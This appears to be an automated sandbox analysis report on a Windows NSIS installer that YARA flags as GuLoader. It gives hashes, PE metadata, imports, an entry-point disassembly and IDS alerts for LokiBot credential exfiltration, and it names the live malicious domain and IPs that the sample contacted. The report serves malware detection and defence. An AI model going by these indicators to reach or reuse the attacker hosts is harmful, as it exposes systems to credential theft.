              SHA-256:CC88E76F7C7D2E5B07E49D1F2AD88F8BAFC0542EB11CEB2B2FFF235C87AB4417
              SHA-512:7291085B6153C02EDBF679CDDB93B97DBB74943F216EB622CE9722E02613269F626F8A7A5BE8DA683153E9AEE22C40ED7264E8A0ED62A99F477E2B96642596BF
              Malicious:false
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:PNG image data, 600 x 600, 8-bit/color RGBA, non-interlaced
              Category:dropped
              Size (bytes):16669
              Entropy (8bit):7.836876926418697
              Encrypted:false
              SSDEEP:384:dg1Ew+1FT+/6trrKWzge5jh2xmalhctpNy:W1E1c6tru1CUYa4tDy
              MD5:F80867A421C85C6E2865CF85FF7C4B02
              SHA1:C3EAB6B7E92646FE3407B2B3C5AFFE13A7873C48
              SHA-256:BCAA3B1333919176137D4DE4B1E3F31126159B12F959D7277BD8537B95139BD3
              SHA-512:06B51E660AEE86FC3BB068C6DEA046920E04F86B8EDD02E640EAC619F0F0D7E87E5CAE5BE1390CEBC5DFE70AA13BAB1710176E88C9D1C859182629D429745D78
              Malicious:false
              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):7.56953186638099
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:o6OaOfrAQs.exe
              File size:335976
              MD5:049ecad4587538c292e3ebeee5947eb5
              SHA1:12aabeb19083dd114b7b94c836b031de3945d2c9
              SHA256:cf9a08d65a0b472b1ed84638a09d39d741f34e9cd2641092141a9bf1a5f796a6
              SHA512:12092128f6b2f6ea6ab86a7b1812e550e598dfecd43a240bd1ffc0bd15ff9c24e3c9bb40a4273ad706b9a7a7ad890b1c708c42cc23ec359626f5024b36db03ce
              SSDEEP:6144:DDk9dhfzelxllPuHBXZOEz5hN4EAnKQo4N7kqZ7t+roIbvS:U9u3lWHBXZTENnKza7kqZ5+rh6
              TLSH:7D6401913AE0D467FC5A4630CAA5E5F3D2A1FE04C916C18373647F6F7D322419922EBA
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...+.oZ.................`.........
              Icon Hash:08c2b0d8cc64b046
              Entrypoint:0x4031d6
              Entrypoint Section:.text
              Digitally signed:true
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0x5A6FED2B [Tue Jan 30 03:57:31 2018 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:3abe302b6d9a1256e6a915429af4ffd2
              Signature Valid:false
              Signature Issuer:E=Brooking183@Flydes25.Dyr, OU="Magtbalancerne Regnvejrsdagene Intensives ", O=Skizofren, L=Onalaska, S=Wisconsin, C=US
              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
              Error Number:-2146762487
              Not Before:05/02/2023 08:25:21
              Not After:04/02/2026 08:25:21
              Subject Chain
              • E=Brooking183@Flydes25.Dyr, OU="Magtbalancerne Regnvejrsdagene Intensives ", O=Skizofren, L=Onalaska, S=Wisconsin, C=US
              Version:3
              Thumbprint MD5:DE53E25C4A808A06A0CD944E65FB058D
              Thumbprint SHA-1:B1DD19494EAA53E29C92E68EB19E33CFABB34DE0
              Thumbprint SHA-256:12FF0462FE369CB81BB77B13ADFE3B705E7F71A5CFA614B370A8D6D63719C06F
              Serial:6CA44E753450CEC7C37D62FEA0B835456441D271
              Instruction
              sub esp, 00000184h
              push ebx
              push esi
              push edi
              xor ebx, ebx
              push 00008001h
              mov dword ptr [esp+18h], ebx
              mov dword ptr [esp+10h], 00409198h
              mov dword ptr [esp+20h], ebx
              mov byte ptr [esp+14h], 00000020h
              call dword ptr [004070A0h]
              call dword ptr [0040709Ch]
              and eax, BFFFFFFFh
              cmp ax, 00000006h
              mov dword ptr [0042370Ch], eax
              je 00007F2D696B3433h
              push ebx
              call 00007F2D696B650Ah
              cmp eax, ebx
              je 00007F2D696B3429h
              push 00000C00h
              call eax
              mov esi, 00407298h
              push esi
              call 00007F2D696B6486h
              push esi
              call dword ptr [00407098h]
              lea esi, dword ptr [esi+eax+01h]
              cmp byte ptr [esi], bl
              jne 00007F2D696B340Dh
              push 0000000Ah
              call 00007F2D696B64DEh
              push 00000008h
              call 00007F2D696B64D7h
              push 00000006h
              mov dword ptr [00423704h], eax
              call 00007F2D696B64CBh
              cmp eax, ebx
              je 00007F2D696B3431h
              push 0000001Eh
              call eax
              test eax, eax
              je 00007F2D696B3429h
              or byte ptr [0042370Fh], 00000040h
              push ebp
              call dword ptr [00407044h]
              push ebx
              call dword ptr [00407288h]
              mov dword ptr [004237D8h], eax
              push ebx
              lea eax, dword ptr [esp+38h]
              push 00000160h
              push eax
              push ebx
              push 0041ECC8h
              call dword ptr [00407178h]
              push 00409188h
              Programming Language:
              • [EXP] VC++ 6.0 SP5 build 8804
              Name | Virtual Address | Virtual Size | Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7428 | 0xa0 | .rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x36000 | 0xa3c0 | .rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x51650 | 0xa18 |
              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
              .text | 0x1000 | 0x5f0d | 0x6000 | False | 0.6649169921875 | data | 6.450520423955375 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata | 0x7000 | 0x1248 | 0x1400 | False | 0.4275390625 | data | 5.007650149182371 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data | 0x9000 | 0x1a818 | 0x400 | False | 0.6376953125 | data | 5.129587811765307 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .ndata | 0x24000 | 0x12000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc | 0x36000 | 0xa3c0 | 0xa400 | False | 0.0760766006097561 | data | 1.8822021165260459 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              Name | RVA | Size | Type | Language | Country
              RT_BITMAP | 0x36268 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States
              RT_ICON | 0x365d0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 0 | English | United States
              RT_DIALOG | 0x3fa78 | 0x144 | data | English | United States
              RT_DIALOG | 0x3fbc0 | 0x13c | data | English | United States
              RT_DIALOG | 0x3fd00 | 0x120 | data | English | United States
              RT_DIALOG | 0x3fe20 | 0x11c | data | English | United States
              RT_DIALOG | 0x3ff40 | 0xc4 | data | English | United States
              RT_DIALOG | 0x40008 | 0x60 | data | English | United States
              RT_GROUP_ICON | 0x40068 | 0x14 | data | English | United States
              RT_MANIFEST | 0x40080 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States
              DLL | Import
              KERNEL32.dll | GetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
              USER32.dll | ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
              GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
              SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
              ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
              COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
              ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
              Language of compilation system | Country where language is spoken
              English | United States
              Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
              03/17/23-20:49:57.296824 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49818 | 80 | 192.168.11.20 | 185.246.220.85
              03/17/23-20:49:57.296824 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49818 | 80 | 192.168.11.20 | 185.246.220.85
              03/17/23-20:49:57.296824 | TCP | 2825766 | ETPRO TROJAN LokiBot Checkin M2 | 49818 | 80 | 192.168.11.20 | 185.246.220.85
              03/17/23-20:49:57.296824 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49818 | 80 | 192.168.11.20 | 185.246.220.85
              03/17/23-20:49:57.296824 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49818 | 80 | 192.168.11.20 | 185.246.220.85
              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Mar 17, 2023 20:49:56.242620945 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.284706116 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.284915924 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.285419941 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.327553988 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.327625036 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.327786922 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.328250885 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.328422070 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.328454018 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.328489065 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.328602076 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.328623056 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.328660011 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.328690052 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.328716993 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.328803062 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.328804016 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.328862906 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.329441071 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.329514027 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.329803944 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.329803944 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.369924068 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.370007992 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.370086908 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.370193005 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.370542049 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.370640993 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.370733976 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.370758057 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.370791912 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.370829105 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.370870113 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.370910883 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.370928049 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.370948076 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.371073961 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.371103048 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.371146917 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.371244907 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.371280909 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.371299028 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.371427059 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.371484041 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.371480942 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.371597052 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.371630907 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.371731043 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.371805906 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.371875048 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.371882915 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.371941090 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.371956110 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.372016907 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.372036934 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.372117996 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.372208118 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.412204027 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.412328959 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.412415981 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.412473917 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.412476063 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.412564039 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.412564039 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.412612915 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.412628889 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.412705898 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.412827969 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.412878990 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.412889004 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.413043976 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.413098097 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.413125992 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.413213015 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.413269043 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.413285971 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.413413048 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.413433075 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.413538933 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.413583994 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.413606882 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.413690090 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.413727045 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.413727999 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.413754940 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.413826942 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.413834095 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.413887024 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.413969040 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.413974047 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.414127111 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.414132118 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.414268970 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.414275885 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.414421082 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.414427996 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.414493084 CET | 80 | 49817 | 85.95.248.49 | 192.168.11.20
              Mar 17, 2023 20:49:56.414573908 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Mar 17, 2023 20:49:56.414619923 CET | 49817 | 80 | 192.168.11.20 | 85.95.248.49
              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Mar 17, 2023 20:49:56.174714088 CET | 54475 | 53 | 192.168.11.20 | 9.9.9.9
              Mar 17, 2023 20:49:56.236529112 CET | 53 | 54475 | 9.9.9.9 | 192.168.11.20
              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
              Mar 17, 2023 20:49:56.174714088 CET | 192.168.11.20 | 9.9.9.9 | 0xc6f2 | Standard query (0) | ruhsalgelisim.com | A (IP address) | IN (0x0001) | false
              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
              Mar 17, 2023 20:49:56.236529112 CET | 9.9.9.9 | 192.168.11.20 | 0xc6f2 | No error (0) | ruhsalgelisim.com | | 85.95.248.49 | A (IP address) | IN (0x0001) | false
              • ruhsalgelisim.com
              • 185.246.220.85

              Target ID:1
              Start time:20:49:22
              Start date:17/03/2023
              Path:C:\Users\user\Desktop\o6OaOfrAQs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\o6OaOfrAQs.exe
              Imagebase:0x400000
              File size:335976 bytes
              MD5 hash:049ECAD4587538C292E3EBEEE5947EB5
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.4873071383.000000000358C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              Reputation:low

              Target ID:4
              Start time:20:49:43
              Start date:17/03/2023
              Path:C:\Users\user\Desktop\o6OaOfrAQs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\o6OaOfrAQs.exe
              Imagebase:0x400000
              File size:335976 bytes
              MD5 hash:049ECAD4587538C292E3EBEEE5947EB5
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              Target ID:7
              Start time:20:49:58
              Start date:17/03/2023
              Path:C:\Windows\SysWOW64\WerFault.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 204
              Imagebase:0x870000
              File size:482640 bytes
              MD5 hash:40A149513D721F096DDF50C04DA2F01F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:moderate

              No disassembly